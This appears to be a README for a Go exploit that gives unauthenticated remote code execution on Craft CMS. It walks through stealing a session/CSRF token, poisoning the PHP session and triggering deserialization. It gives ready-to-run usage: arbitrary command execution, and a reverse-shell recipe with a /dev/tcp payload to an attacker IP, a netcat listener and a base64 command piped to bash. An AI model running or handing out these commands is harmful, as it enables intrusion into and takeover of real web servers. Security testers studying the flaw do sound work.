
Exploit de RCE sin autenticación para Craft CMS en Go. Obtiene el token de sesión/CSRF, envenena la sesión de PHP y desencadena la deserialización para ejecución de comandos o shell inversa.
Exploit para ejecución remota de código sin autenticación en Craft CMS, escrito en Go.
Inspirado en el trabajo original de c0gnit00.
GET /admin/loginassets/generate-transform para incluir y ejecutar el archivo envenenadogo run main.go -u <url> -c <comando>
| Flag | Descripción | Obligatorio |
|---|---|---|
-u | URL objetivo (ej: http://target.com) | Sí |
-c | Comando a ejecutar (ej: id, whoami) | Sí |
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami
1. Genera el payload en base64 con tu IP y puerto:
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64
2. Abre el listener:
nc -lvnp 4444
3. Ejecuta el exploit con el payload:
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"
Sustituye el valor en base64 por el generado en el paso 1 con tu IP real.
Para uso exclusivo en entornos autorizados y pruebas de seguridad controladas.